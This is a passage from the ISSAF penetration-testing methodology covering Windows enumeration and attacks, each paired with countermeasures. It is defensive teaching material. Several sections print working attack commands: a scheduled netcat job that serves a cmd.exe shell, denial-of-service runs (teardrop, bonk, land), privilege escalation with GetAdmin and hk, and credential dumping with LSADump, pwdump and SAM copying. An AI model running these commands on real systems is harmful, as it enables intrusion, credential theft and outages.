Nombre de recurso compartido  Tipo       Usado como  Comentario
-------------------------------------------------------------------------------
Compartido                    Disco
EPSONSty                      Impresora              EPSON Stylus C70 Series
HP 4050                       Impresora              HP LaserJet 4050 Series PCL6
Mi música                     Disco
Se ha completado el comando correctamente.
Using “Enum.exe” to view visible and hidden shares:
C:\>enum -S workstation
server: workstation
setting up session... success.
enumerating shares (pass 1)... got 10 shares, 0 left:
  IPC$ print$ EPSONSty Mi música HP 4050 ADMIN$ C$ Compartido
cleaning up... success.
Analysis/Conclusion/Observation
An attacker was able to obtain the server visible and hidden shares.
Countermeasures
Restrict anonymous access to your registry and public access to ports 135-139 & 445.
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\LSA\RestrictAnonymous=2
Tool[s]
http://www.bindview.com/Resources/RAZOR/Files/enum.tar.gz
Further Reading[s]
http://support.microsoft.com/default.aspx?scid=http://support.microsoft.com:80/support/kb/
articles/Q246/2/61.ASP&NoWebContent=1
Remarks
F.8.3.3 IDENTIFY POLICIES
Description
The Windows password and account lockout policies can also be obtained.
Pre-requisite[s]
Ports 135/TCP and 139/TCP or 445/TCP have to be reachable.
The target machine has to have the Server service started and working.
Steps to be performed
Examples/Results
C:\>enum -P pc-oscar
server: pc-oscar
setting up session... success.
password policy:
min length: none
min age: none
max age: 42 days
lockout threshold: none
lockout duration: 30 mins
lockout reset: 30 mins
cleaning up... success.
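A check over the enum -P output shape shown above, as an added example that is not part of ISSAF: it parses the "password policy:" block into numbers and flags the settings that leave accounts exposed to the brute-force attack described later (no minimum length, no lockout threshold, no maximum age). The sample output and the baseline values (8 characters, 5 attempts, 90 days) are constructed assumptions for the example.

```python
import re
from typing import Dict, List, Optional

# Constructed copy of the enum -P output layout shown above (same fields).
SAMPLE_ENUM_P = """\
server: pc-oscar
setting up session... success.
password policy:
  min length: none
  min age: none
  max age: 42 days
  lockout threshold: none
  lockout duration: 30 mins
  lockout reset: 30 mins
cleaning up... success.
"""

# Assumed hardening baseline for the example; adjust to the policy under assessment.
MINIMUMS = {"min length": 8, "lockout threshold": 5}
MAX_AGE_DAYS = 90


def _to_number(value: str) -> Optional[int]:
    """'none' -> None, '42 days' -> 42, '30 mins' -> 30."""
    value = value.strip()
    if value == "none":
        return None
    m = re.match(r"(\d+)", value)
    return int(m.group(1)) if m else None


def parse_enum_policy(text: str) -> Dict[str, Optional[int]]:
    """Read the 'password policy:' block of enum -P output into numeric values.

    The block ends at the first following line without a 'key: value' shape
    (the 'cleaning up...' status line).
    """
    policy: Dict[str, Optional[int]] = {}
    in_block = False
    for line in text.splitlines():
        if line.strip() == "password policy:":
            in_block = True
            continue
        if in_block:
            key, sep, value = line.strip().partition(":")
            if not sep:
                break
            policy[key.strip()] = _to_number(value)
    return policy


def weak_settings(policy: Dict[str, Optional[int]]) -> List[str]:
    """Return findings for settings that make online password guessing cheap."""
    findings = []
    for key, minimum in MINIMUMS.items():
        val = policy.get(key)
        if val is None:
            findings.append(f"{key} not enforced")
        elif val < minimum:
            findings.append(f"{key} is {val}, below {minimum}")
    max_age = policy.get("max age")
    if max_age is None or max_age > MAX_AGE_DAYS:
        findings.append(f"max age not enforced or above {MAX_AGE_DAYS} days")
    return findings


if __name__ == "__main__":
    for finding in weak_settings(parse_enum_policy(SAMPLE_ENUM_P)):
        print("WEAK:", finding)
```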
Analysis/Conclusion/Observation
An attacker was able to obtain the server password policies.
Countermeasures
Restrict anonymous access to your registry and public access to ports 135-139 & 445.
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\LSA\RestrictAnonymous=2
Tool[s]
http://www.bindview.com/Resources/RAZOR/Files/enum.tar.gz
Further Reading[s]
http://support.microsoft.com/default.aspx?scid=http://support.microsoft.com:80/support/kb/articles/Q246/2/61.ASP&NoWebContent=1
Remarks
F.8.3.4 MIB ENUMERATION
Description
You can enumerate the system MIB using the SNMP protocol. It gives you information
such as usernames, running services or open ports. The most commonly used communities
for accessing MIBs are "public" and "private". You can try to guess the community with
brute-force programs or with a dictionary.
Pre-requisite[s]
Port 161/UDP has to be reachable.
The target machine has to have the SNMP service started and working.
Steps to be performed
Examples/Results
Using “SNMPUTIL” from Windows Support Tools:
Example HERE
Using Solarwinds MIB Browser or Network Browser:
Example HERE
Analysis/Conclusion/Observation
An attacker was able to gather some useful information from the server.
Countermeasures
Restrict access to port 161/UDP.
Enforce a strong SNMP community string (password) policy.
Tool[s]
http://www.solarwinds.net/
SNMPUTIL from Windows 2000 Support Tools (Windows 2000 Server)
Getif-snmp
MIB browser by iReasoning
Further Reading[s]
http://support.microsoft.com/default.aspx?scid=kb;en-us;323340
http://www.faqs.org/rfcs/rfc1157.html
Remarks
F.8.3.5 IDENTIFY DOMAINS ON THE NETWORK
Description
More than one domain may be reachable on the same network, because there are trust
relationships between two or more domains handled by the same domain controller.
Pre-requisite[s]
Ports 135/TCP and 139/TCP or 445/TCP have to be reachable.
The target machine has to have the Computer Browser service started and working.
Steps to be performed
NetBIOS query to know the first domain
Use netdom.exe (from Support Tools) to list whatever you want
Examples/Results
Using netdom.exe:
netdom query /domain:domain trust
Analysis/Conclusion/Observation
An attacker was able to obtain the domain trust relationships and can use all the trusted
domains to obtain more sensitive data.
Countermeasures
Restrict public access to ports 135-139 & 445.
Tool[s]
http://www.microsoft.com/downloads/details.aspx?FamilyID=49ae8576-9bb9-4126-9761ba8011fabf38&displaylang=en
Further Reading[s]
Remarks
F.8.3.6 IDENTIFY DOMAIN CONTROLLERS
Description
You can view all domain controllers managing a domain; they may be protected with
differing levels of effort.
Pre-requisite[s]
Ports 135/TCP and 139/TCP or 445/TCP have to be reachable
Steps to be performed
NetBIOS query to know the first domain
Use netdom.exe (from Support Tools) to list whatever you want
Examples/Results
Using netdom.exe:
netdom query /domain:domain dc
netdom query /domain:domain pdc
netdom query /domain:domain fsmo
Analysis/Conclusion/Observation
An attacker was able to obtain all the domain controllers and can use them to obtain more
sensitive data.
Countermeasures
Restrict public access to ports 135-139 & 445.
Tool[s]
http://www.microsoft.com/downloads/details.aspx?FamilyID=49ae8576-9bb9-4126-9761ba8011fabf38&displaylang=en
Further Reading[s]
Remarks
F.8.3.7 IDENTIFY HOSTS OF DOMAIN
Description
You can view a list of the workstations or servers of a domain.
Pre-requisite[s]
Ports 135/TCP and 139/TCP or 445/TCP have to be reachable
Steps to be performed
NetBIOS query to know the first domain
Use netdom.exe (from Support Tools) to list whatever you want
Examples/Results
Using netdom.exe:
netdom query /domain:domain workstation
netdom query /domain:domain server
netdom query /domain:domain ou
Analysis/Conclusion/Observation
An attacker was able to obtain all the domain controllers and can use them to obtain more
sensitive data.
Countermeasures
Restrict public access to ports 135-139 & 445.
Tool[s]
http://www.microsoft.com/downloads/details.aspx?FamilyID=49ae8576-9bb9-4126-9761ba8011fabf38&displaylang=en
Further Reading[s]
Remarks
F.8.4 NETWORK MAPPING
Refer ISSAF Methodology Section
F.8.4.1 IDENTIFY LIVE HOSTS
Description
You can identify the live hosts on the network. Each live host can become a potential
target.
Pre-requisite[s]
Steps to be performed
Ping sweep the whole network.
Examples/Results
Use pinger
Use Solarwinds Pingsweep utility
Nmap ping sweep.
Analysis/Conclusion/Observation
An attacker was able to enumerate the live hosts in the target network.
Countermeasures
Tool[s]
Further Reading[s]
Remarks
Be careful while performing this activity. It can easily saturate a slow link.
F.8.5 VULNERABILITY IDENTIFICATION
Refer section -- --
F.8.6 PENETRATION
1. Examine Common Protocols -> Port scan. Maybe this section is in another doc
2. Examine Windows WinNT/2k/2003
   Remote Attacks
   a. Password Attacks
      • SMBGrind
F.8.6.1 BRUTEFORCE PASSWORDS – REMOTE ATTACK
Description
You can brute force known usernames with a dictionary or with brute force.
Pre-requisite[s]
Ports 135/TCP and 139/TCP or 445/TCP have to be reachable
To know at least one username
To know password policies (if you don’t want to lock accounts)
Steps to be performed
Examples/Results
Using enum.exe:
enum -u administrador -D -f test.txt 10.1.2.3
Analysis/Conclusion/Observation
An attacker was able to obtain all the domain controllers and can use them to obtain more
sensitive data.
Countermeasures
Restrict public access to ports 135-139 & 445.
Tool[s]
http://www.cqure.net/tools.jsp?id=19 - CifsPwScanner
http://www.bindview.com/Resources/RAZOR/Files/enum.tar.gz - Enum.exe
http://www.tamos.com/bitrix/redirect.php?event1=download&event2=nettools&event3=&goto=/files/ent3.zip - Essential NetTools 3.2
http://www.packetstormsecurity.com/NT/EZPass.zip - EZPass
http://www.packetstormsecurity.com/NT/scanners/nat10bin.zip - NAT for Windows
http://www.packetstormsecurity.com/NT/scanners/nat10.tar.gz - NAT for Linux
Further Reading[s]
Remarks
Be careful with domain password policies or you can lock a lot of accounts.
3. Examine Common Protocols
4. Examine Windows WinNT/2k/2003
   Remote Attacks
   a. Password Attacks
      • SMBGrind
   b. Buffer overflow Attacks -> link to another doc explaining BoFs
      • Parameter Checks in System Calls
   c. Heapoverflow Attacks -> link to another doc explaining BoFs
   d. Integeroverflow Attacks -> link to another doc explaining BoFs
   e. Formatstring Attacks -> link to another doc explaining BoFs
   f. Web Server Attack -> link to another doc explaining BoFs
   g. Mail Server Attacks -> link to another doc explaining BoFs
   h. NetBIOS Attacks
      • RedButton -> It's only a NULL Session attack, required to gather
        users... Explained before on Identify Users
   i. Server Message Block Attacks
   j. MD4 Collision Attacks
   k. Scheduling Attacks
   l. Registry Attack
   m. Reverse Shell Attacks
   n. Port Redirection
   o. Sechole Attack (IIS)
   p. Denial of Service Attack
      • WinNuke
      • Teardrop, Teardrop2 (bonk and boink)
      • Land and LaTierra
   Local Attacks
   a. Registry Attacks
   b. Privilege escalation
      • GetAdmin
      • pipeup admin
      • LPC attack
      • everyone2user.exe
   c. Password Attacks
      • Password Dumping
      • DLL Injection
   d. Bypassing the Authentication
      • Using other Operating System
      • Using bootable Tools
   e. File System Attack
      • File Allocation Table (FAT)
      • High Performance File System (HPFS)
      • NT File System (NTFS)
      • Named Pipe File System (NPFS)
      • Mailslot File System (MSFS)
   f. Denial of Service Attack
      • NTCrash
      • CPUHog
      • System Initialization
      • Rollback
   g. Virus Attacks
5. Examine Windows Desktops
a. Windows 95/98
b. Windows ME
c. Windows XP
Refer ISSAF Methodology Section.
F.8.7 GAINING ACCESS AND PRIVILEGE ESCALATION
Refer ISSAF Methodology Section.
F.8.8 ENUMERATE FURTHER
Refer ISSAF Methodology Section.
F.8.9 MAINTAINING ACCESS
Refer ISSAF Methodology Section.
F.8.10 COVERING THE TRACKS
Refer ISSAF Methodology Section.
F.8.11 AUDIT
Refer ISSAF Methodology Section.
F.8.12 REPORTING
Refer ISSAF Methodology Section.
F.8.13 CLEAN UP AND DESTROY ARTIFACTS
Refer ISSAF Methodology Section.
F.9 IDENTIFY LIVE HOSTS
Refer ISSAF Methodology Section.
F.10 IDENTIFY PORTS AND SERVICES
Refer ISSAF Methodology Section.
F.11 ENUMERATION ATTACK
F.11.1 Browse List
• Identify Browser Masters
• Identify Domains on the Network
• Identify Domain Controllers
• Identify Hosts of Domain
• View Domain Membership
F.11.2 Identify Browser Masters
Description
Pre-requisite[s]
Steps to be performed
Examples/Results
C:\>nbtstat -A 192.168.0.10

Local Area Connection:
Node IpAddress: [192.168.0.10] Scope Id: []

           NetBIOS Remote Machine Name Table

       Name               Type         Status
    ---------------------------------------------
    MITHU          <00>  UNIQUE      Registered
    MITHU          <20>  UNIQUE      Registered
    MITHU          <03>  UNIQUE      Registered
    WORKGROUP      <00>  GROUP       Registered
    WORKGROUP      <1E>  GROUP       Registered
    BALWANT        <03>  UNIQUE      Registered

    MAC Address = 00-0B-2B-0E-2B-AF
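A parser for the nbtstat name table shown above, as an added example that is not part of ISSAF: it reads each registered name with its suffix and type, separates the computer name, workgroup and logged-on user, and reports the browser roles (<1D> master browser, <1B> domain master browser, <1E> election group, the __MSBROWSE__ announcement). The sample table is constructed; names and MAC are made up.

```python
import re
from typing import Dict, List, Tuple

# NetBIOS suffix meanings relevant to browser and domain discovery.
SUFFIX_ROLES = {
    ("00", "UNIQUE"): "Workstation service (computer name)",
    ("00", "GROUP"): "Domain/workgroup name",
    ("03", "UNIQUE"): "Messenger service (computer or logged-on user)",
    ("20", "UNIQUE"): "File Server service",
    ("1B", "UNIQUE"): "Domain Master Browser",
    ("1C", "GROUP"): "Domain controllers",
    ("1D", "UNIQUE"): "Master Browser",
    ("1E", "GROUP"): "Browser service elections",
}

# Constructed nbtstat -A output in the layout shown above; values are made up.
SAMPLE_NBTSTAT = """\
           NetBIOS Remote Machine Name Table

       Name               Type         Status
    ---------------------------------------------
    FILESRV        <00>  UNIQUE      Registered
    FILESRV        <20>  UNIQUE      Registered
    FILESRV        <03>  UNIQUE      Registered
    CORP           <00>  GROUP       Registered
    CORP           <1E>  GROUP       Registered
    CORP           <1D>  UNIQUE      Registered
    JDOE           <03>  UNIQUE      Registered
    ..__MSBROWSE__.<01>  GROUP       Registered

    MAC Address = 00-11-22-33-44-55
"""

ROW_RE = re.compile(r"^\s*(\S.*?)\s*<([0-9A-Fa-f]{2})>\s+(UNIQUE|GROUP)\s+(\w+)")
Row = Tuple[str, str, str, str]  # (name, suffix, type, status)


def parse_name_table(text: str) -> List[Row]:
    """Return one (name, suffix, type, status) tuple per row of the name table."""
    rows: List[Row] = []
    for line in text.splitlines():
        m = ROW_RE.match(line)
        if m:
            rows.append((m.group(1), m.group(2).upper(), m.group(3), m.group(4)))
    return rows


def classify(rows: List[Row]) -> Dict[str, List[str]]:
    """Group what the registered names tell an assessor about the host."""
    info: Dict[str, List[str]] = {"computer": [], "workgroups": [], "users": [], "roles": []}
    # The <00> UNIQUE name is the computer; a <03> entry with any other name
    # is the Messenger registration of the logged-on user.
    computers = {n for n, s, t, _ in rows if (s, t) == ("00", "UNIQUE")}
    for name, suffix, ntype, status in rows:
        if status != "Registered":
            continue
        key = (suffix, ntype)
        if key == ("00", "UNIQUE"):
            info["computer"].append(name)
        elif key == ("00", "GROUP"):
            info["workgroups"].append(name)
        elif key == ("03", "UNIQUE"):
            if name not in computers:
                info["users"].append(name)
        elif name.startswith("..__MSBROWSE__."):
            info["roles"].append(f"{name} Master Browser announcement")
        elif key in SUFFIX_ROLES:
            info["roles"].append(f"{name}<{suffix}> {SUFFIX_ROLES[key]}")
    return info


def is_master_browser(rows: List[Row]) -> bool:
    """A host holding <1D> UNIQUE or the __MSBROWSE__ name is the segment's master browser."""
    return any(s == "1D" and t == "UNIQUE" for _, s, t, _ in rows) or \
        any(n.startswith("..__MSBROWSE__.") for n, _, _, _ in rows)
```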
Analysis/Conclusion/Observation
Tool[s]
Countermeasures
Further Reading[s]
Remarks
F.11.3 Identify Domains on the Network
Description
This will identify the domains on the network.
Pre-requisite[s]
Steps to be performed
Run net view with domain option.
Examples/Results
C:\>net view /domain
Analysis/Conclusion/Observation
Countermeasures
Tool[s]
Further Reading[s]
Remarks
F.11.4 Identify Domain Controllers
Description
Pre-requisite[s]
Steps to be performed
Examples/Results
C:\>nltest /dclist:<domainname>
Analysis/Conclusion/Observation
Countermeasures
Tool[s]
Further Reading[s]
Remarks
F.11.5 Identify Browser Masters
Description
Pre-requisite[s]
Steps to be performed
Examples/Results
C:\>nltest /dclist:<domainname>
Analysis/Conclusion/Observation
Countermeasures
Tool[s]
Further Reading[s]
Remarks
F.11.6 Identify Hosts of Domain
Description
Pre-requisite[s]
Steps to be performed
Examples/Results
C:\>net view /domain:<domain_name>
Analysis/Conclusion/Observation
Countermeasures
Tool[s]
Further Reading[s]
Remarks
F.11.7 View Domain Membership
Description
Pre-requisite[s]
Steps to be performed
Examples/Results
C:\> netdom query \\host_name
Analysis/Conclusion/Observation
Countermeasures
Tool[s]
Further Reading[s]
Remarks
F.12 GLOBAL COUNTERMEASURES
F.13 CONTRIBUTORS
F.14 FURTHER READING[S]
F.15 EXAMINE COMMON PROTOCOLS
SNMP
TFTP
FTP
SMTP
HTTP
NNTP
Telnet
Layer 2 Protocols
Refer section -- --
F.16 EXAMINING WINDOWS SYSTEMS
F.16.1 Remote Attacks
Description
Remote attacks are more dangerous because the attacker need not be physically present.
They are hard to trace because of legal, physical and staging (attacking from compromised
hosts) constraints.
F.16.2 Password Attacks
Refer Password Cracking Section from ISSAF.
F.16.3 Buffer overflow Attacks
F.16.4 Heap Overflow Attacks
F.16.5 Integer Overflow Attacks
F.16.6 Formatstring Attacks
F.16.7 Web Attacks
Description
Refer to IIS Security Assessment Section
F.16.8 Mail Service Attacks
F.16.9 NetBIOS Attacks
Description
The NetBIOS service is widely used in Windows for file sharing. Attacks on this service result
in enumeration of shares and usernames, and sometimes Admin-level access on the system.
The most important port for this service is port 139, but services running on ports 135-139 and
port 445 are all NetBIOS services. If NetBIOS over TCP/IP is enabled, these attacks can be
carried out over the Internet as well.
Pre-requisite[s]
Steps to be performed
1. Establish null session with target.
2. Enumerate shares, users, network table entries etc.
3. Enumerate remote registry using DumpSec.
4. Perform RPC-dcom and Red-Button attack on remote system.
Examples/Results
<Screen shots>
Analysis/Conclusion/Observation
Using RPC-dcom one can get a command prompt with SYSTEM privileges, remotely.
Red-Button will map and access the remote machine without using any credentials.
Countermeasures
Apply Microsoft’s Hotfix for the RPC-dcom vulnerability. Restrict anonymous login by
changing the registry value.
Tool[s]
Further Reading[s]
Remarks
F.16.10 SMB Attack
Description
SMB is the Server Message Block file sharing protocol. When a Windows system tries to
access a share on a remote machine it is presented with a challenge from the remote
machine. The challenge is hashed, and the reply sent back by the initiator's system is also
hashed. If someone successfully captures these hashes, passwords can be retrieved from
them. There are many ways of performing these attacks on the target machine.
Pre-requisite[s]
Steps to be performed
1. Run l0pht crack with SMB capture feature
2. Collect the hashes being passed over the network for authentication
3. Import these hashes in the main program and run the cracker.
Examples/Results
<Screen shots>
Analysis/Conclusion/Observation
An attacker was able to capture hashes being passed over the shared media without
having to try anything other than running SMB capture option.
Countermeasures
Use switched media instead of Shared media.
Tool[s]
A tool that needs mention here is l0phtCrack by @stake. http://www.atstake.com/
Further Reading[s]
Remarks
F.16.11 MD4 Collision Attacks
Description
Pre-requisite[s]
Steps to be performed
Examples/Results
<Screen shots>
Analysis/Conclusion/Observation
Countermeasures
Tool[s]
Further Reading[s]
Remarks
F.16.12 Scheduling Attacks
Description
An attacker can schedule the Trojan to send a shell back to him at a certain time, every
day. He just needs to have the Trojan on the target machine. Microsoft's at utility can do
this efficiently, and it can be done remotely as well.
Pre-requisite[s]
Steps to be performed
1. Copy the Trojan file into the target system
2. Schedule the periodical execution of Trojan on the remote target.
Examples/Results
<Screen shots>
Analysis/Conclusion/Observation
C:\> at \\172.16.0.6 03:00A /every:1 "nc -d -L -p 80 -e cmd.exe"
Countermeasures
Disable the scheduling service. If you need to run the scheduling service, keep checking
the scheduler queue for suspicious jobs and kill any you find with the NTRK kill utility.
Tool[s]
Further Reading[s]
Remarks
F.16.13 Registry Attacks
Description
After a compromise an attacker can hide backdoors in the system and make entries in the
registry to launch his malicious code. Things like netcat or key loggers can be activated on
system startup using HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run or similar
entries.
Pre-requisite[s]
1. Copy the backdoor in the system
2. Run regedit
3. Change HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
Steps to be performed
Examples/Results
<Screen shots>
Analysis/Conclusion/Observation
By using the registry to execute files at system startup, the attacker was able to maintain
access to the system.
Countermeasures
Keep checking the registry for the suspicious entries.
Tool[s]
Further Reading[s]
Remarks
F.16.14 Port Redirection Attack
Description
Pre-requisite[s]
Steps to be performed
Examples/Results
Analysis/Conclusion/Observation
Tool[s]
Countermeasures
Further Reading[s]
Remarks
F.16.15 Sechole Attack
Refer To IIS Security Assessment Section of ISSAF.
F.16.16 Teardrop
Description
In this attack two packets are sent: one normal packet with the MF flag set, and another
whose fragmentation offset falls inside the first packet but whose total size makes it
smaller than the first, with the MF bit not set. When the system tries to align these two
packets it ends up with an offset that is larger than the end mark, and by doing so reads
too much data, effectively crashing the system.
Pre-requisite[s]
Steps to be performed
1. Run teardrop with a source and a target address against a remote target.
Examples/Results
#teardrop 172.16.0.13 172.16.0.16 -t 138 -n 10
Analysis/Conclusion/Observation
Here 172.16.0.16 is the target, -t specifies the port and the -n switch specifies the
number of consecutive attacks to be performed. A machine without Microsoft's hotfixes
froze and needed to be rebooted.
Tool[s]
Countermeasures
1. Apply Microsoft's Hotfix for teardrop attack.
Further Reading[s]
Remarks
F.16.17 Teardrop2
Description
This attack is a variation of Teardrop, as it uses the same code. The difference is that the
offset size does not matter in this case. The attack works because the last fragment has an
offset that lies within the UDP header and will therefore partially overwrite the header; the
result is an incomplete UDP packet. These packets take up memory and eventually cause a
crash. There are two tools available for this attack, bonk and boink. Bonk attacks only one
port, namely port 55, while boink gives the user the option to define a range of ports to
attack.
Pre-requisite[s]
Steps to be performed
1. Run Boink and Bonk against the "unpatched" target.
Examples/Results
#boink 172.16.0.13 172.16.0.16 100 200 10
Here the arguments 100 200 define the port interval and 10 is the number of times boink attacks
the target (172.16.0.16) consecutively.
#bonk 172.16.0.13 172.16.0.16 50
Analysis/Conclusion/Observation
Here 172.16.0.16 is the target and bonk attacks it 50 times.
Tool[s]
Countermeasures
• Apply the relevant Microsoft hotfix.
Further Reading[s]
Remarks
F.16.18
Land
Description
This attack sends a packet to the target with the target's own IP address as both source and
destination. This crashes Windows 95 machines and freezes Windows NT machines for some time.
Pre-requisite[s]
Steps to be performed
1. Run Land against the target
Examples/Results
#land 172.16.0.16 139
Analysis/Conclusion/Observation
With a service pack level below SP3 the machine crashed; with Service Pack 3 the machine froze for
around 45 seconds.
Tool[s]
Countermeasures
Apply the relevant Microsoft hotfixes.
Further Reading[s]
Remarks
F.16.19
LaTierra
Description
This attack is similar to Land but offers more options, such as which TCP flag to set or whether
TCP or UDP should be used. The effects of LaTierra are the same as Land: unpatched systems crash
or freeze for some time.
Pre-requisite[s]
Steps to be performed
1. Run LaTierra against the target.
Examples/Results
#latierra -i 172.16.0.16 -b 139
Analysis/Conclusion/Observation
With a service pack level below SP3 the machine crashed; with Service Pack 3 the machine froze for
around 45 seconds.
Tool[s]
Countermeasures
Apply the relevant Microsoft hotfixes.
Further Reading[s]
Remarks
F.16.20
Local Attacks
Local attacks are performed by someone who has non-privileged and/or physical access to the
systems. In most cases the attacker knows the security mechanisms in place and can potentially
use social engineering more effectively.
F.16.21
Registry Attacks
Refer to the Registry Attacks section under Remote Attacks.
F.16.22
GetAdmin
Description
GetAdmin is a local exploit that grants instant administrator privileges to any chosen user. It
runs locally and works on Windows NT 4.0 with Service Pack 3. Versions exist that circumvent the
hotfix Microsoft provided for it.
Pre-requisite[s]
Steps to be performed
1. Run the GetAdmin tool from a command prompt on the target machine
Examples/Results
C:\> getadmin balwant
Analysis/Conclusion/Observation
After a reboot, user balwant is a member of the Administrators group.
Tool[s]
Countermeasures
1. Upgrade the Windows NT system to Windows 2000
2. Apply the relevant patches and service packs
Further Reading[s]
Remarks
F.16.23
Pipeup Admin Attack
Description
Pre-requisite[s]
Steps to be performed
Examples/Results
Analysis/Conclusion/Observation
Tool[s]
Countermeasures
Further Reading[s]
Remarks
F.16.24
LPC Attack
Description
A flaw in one function of the LPC (Local Procedure Call) Ports API leads to a local privilege
escalation. The Razor team released a tool that exploits this vulnerability, called hk, which
adds the desired user to the Administrators group. The user name must be a valid user name on the
system.
Pre-requisite[s]
Steps to be performed
1. Run hk locally on the target system
Examples/Results
c:\> hk net localgroup administrators desired-user-name /add
lsass pid & tid are 47-48
NtImpersonateClientOfPort suceeded
Launching line was: net localgroup administrators desired-user-name /add
Who do you want to be today?
Analysis/Conclusion/Observation
The attacker was able to escalate privileges on the system to administrator level.
Tool[s]
Countermeasures
• Apply Microsoft's post-SP6 hotfix.
• Upgrade to Windows 2000.
Further Reading[s]
Remarks
F.16.25
Key Logger Attacks
Description
Pre-requisite[s]
Steps to be performed
Examples/Results
Analysis/Conclusion/Observation
Tool[s]
Countermeasures
Further Reading[s]
Remarks
F.16.26
Password Dumping
Description
Secure session channels are created using a special "trusted" domain password that the Primary
Domain Controller (PDC) of the domain creates and adds to the LSA Policy Database of each system
as it is added to the domain. The PDC then changes this password every seven days and replicates
the change to every trusted system in the domain. This trusted password, known by its registry
subkey name $MACHINE.ACC, is stored under HKEY_LOCAL_MACHINE\SECURITY\Policy\Secrets.
LSADump is a utility that retrieves the LSA secrets from the registry and prints them on the
screen. It needs administrative privileges on the target: the SECURITY hive is readable only by
SYSTEM, so the tool has to run under an administrative account that can obtain that access.
Pre-requisite[s]
Steps to be performed
1. Compile and run the LSADump code on the target machine.
Examples/Results
C:\> lsadump $machine.acc \\target
QaVmkA3F
C:\>
Analysis/Conclusion/Observation
Running the tool dumped the machine account secret ($MACHINE.ACC) stored in the registry.
Tool[s]
LSADump
Countermeasures
• Upgrade to Windows 2000
• Install SYSKEY encryption
Further Reading[s]
Remarks
F.16.27
DLL injection Attack
Description
This application dumps the password hashes from NT's SAM database, whether or not SYSKEY is
enabled on the system. The output can be used as input to L0phtCrack or with Samba. It requires
SeDebugPrivilege, which by default only Administrators hold, so on its own the program does not
compromise NT security; but if an intruder runs it together with another exploit (e.g. an IIS
exploit) that gives him administrative rights, he obtains the password hashes of every user on
that system. Cracking the hashes is then only a matter of time.
The newer version, pwdump3, can retrieve the hashes over the network, again whether or not
SYSKEY is installed.
Pre-requisite[s]
Steps to be performed
1. Copy pwdump2.exe and samdump.dll to a directory on the target machine
2. Run pwdump2.exe and redirect its output to a text file
3. Use the text file as input to L0phtCrack to obtain the passwords
Examples/Results
c:\pwdump2> pwdump2.exe >password.txt
Analysis/Conclusion/Observation
pwdump is a good way to audit the system for weak passwords.
Tool[s]
pwdump2, pwdump3
Countermeasure[s]
• Store the SAM database on secure removable media that is only attached at boot time.
• Install SYSKEY.
Note that pwdump2 works by injecting samdump.dll into the LSASS process, so SYSKEY does not stop
an attacker who already holds administrative rights; the effective control is preventing that
administrative compromise in the first place.
Further Reading[s]
Remarks
F.16.28
Bypassing the Authentication: Booting from Alternate OS
Description
The attacker boots from an alternate OS (Knoppix, NTFSDOS, etc.) and grabs the information he
wants. The most common target is the SAM file in the repair directory. The attacker can take this
file away and crack it at leisure; this way his activities are also less likely to be logged.
Note that WINNT\repair\sam._ is the backup written by rdisk and may be stale or compressed; the
live database at WINNT\system32\config\SAM is locked while Windows runs but is readable from the
alternate OS.
Pre-requisite[s]
Steps to be performed
1. Boot the system using Knoppix
2. Mount the system drive
3. Copy the SAM file to a floppy
4. Shut down the system and remove the Knoppix CD
Examples/Results
(Assuming the attacker has booted the system with Knoppix)
Get a shell prompt, then:
# mount -t vfat -o ro /dev/hda1 /mnt/hda1       (use -t ntfs for an NTFS system drive)
# cp /mnt/hda1/WINNT/repair/sam .
# mount -t vfat /dev/fd0 /mnt/floppy              (mount the floppy; copying to the raw device would not create a file)
# cp sam /mnt/floppy/
# umount /mnt/floppy
# umount /dev/hda1
# halt
Analysis/Conclusion/Observation
The attacker now has the SAM file and can crack it whenever convenient.
Tool[s]
Countermeasure[s]
Implement container (volume) encryption for critical drives, but be forewarned that this may
affect performance. Also disable booting from removable media in the BIOS and protect the BIOS
settings with a password, so that the machine cannot be booted from an attacker's CD or floppy.
Further Reading[s]
Remarks
F.16.29
ERD Commander 2003
Description
This commercial application can do almost everything an attacker with physical access would
like to do to a system. ERD Commander comes with utilities such as Locksmith, NTRecover and File
Explorer. With ERD Commander 2003 you can do any of the following:
• Remove or replace drivers
• Change local Administrator passwords
• Replace system files
• Recover deleted files
• Check for misconfigured NTFS security
• Access System Restore points on unbootable XP machines
• Enable, disable and configure services and drivers
• Edit the registry and reset permissions
• Access unbootable machines via the network
• View the Application, Security and System event logs
Pre-requisite[s]
Steps to be performed
1. Download ERD Commander and burn it to a CD
2. Boot the target system from it
3. Run Locksmith to reset the Administrator password
4. Run File Explorer to pilfer information
5. Run the Registry Editor to change the registry and reset registry permissions
Examples/Results
<screen shots>
Analysis/Conclusion/Observation
Tool[s]
Countermeasure[s]
Restrict physical access to the system
Further Reading[s]
Remarks
Various other options are available for resetting the administrator password, for example
http://home.eunet.no/%7Epnordahl/ntpasswd/ . Be extremely careful when using these utilities;
they can render the system unusable.
F.16.30
File System Attacks: FAT Attacks
Description
Pre-requisite[s]
Steps to be performed
Examples/Results
Analysis/Conclusion/Observation
Tool[s]
Countermeasure[s]
Further Reading[s]
Remarks
F.16.31
File System Attacks: HPFS Attacks
Description
Pre-requisite[s]
Steps to be performed
Examples/Results
Analysis/Conclusion/Observation
Tool[s]
Countermeasure[s]
Further Reading[s]
Remarks
F.16.32
File System Attacks: NTFS Attacks
Description
Pre-requisite[s]
Steps to be performed
Examples/Results
Analysis/Conclusion/Observation
Tool[s]
Countermeasure[s]
Further Reading[s]
Remarks
F.16.33
File System Attacks: MSFS Attacks
Description
Pre-requisite[s]
Steps to be performed
Examples/Results
Analysis/Conclusion/Observation
Tool[s]
Countermeasure[s]
Further Reading[s]
Remarks
F.16.34
Denial of Service Attacks
Description
Denial of Service attacks are bad for business: they cause data loss, revenue loss and damage to
the credibility of the corporate network. They are the most loathed attacks, and most seasoned
attackers avoid them as far as possible. These attacks must only be tested on non-production
systems.
Pre-requisite[s]
Steps to be performed
Examples/Results
Analysis/Conclusion/Observation
Tool[s]
Countermeasure[s]
Further Reading[s]
Link1: http://techupdate.zdnet.com/techupdate/stories/main/0,14179,2819030,00.html
Link2:
http://www.microsoft.com/technet/treeview/default.asp?url=/TechNet/security/news/raw_so
ckets.asp
Remarks
F.16.35
Denial of Service: NTCrash
Description
NT programs use NTOSKRNL by invoking functions through calls to certain libraries (DLLs). In some
of these calls the parameters are not checked properly; the missing checks are primarily range
checks and checks on the legality of addresses. NTCrash, a program written by Mark Russinovich and
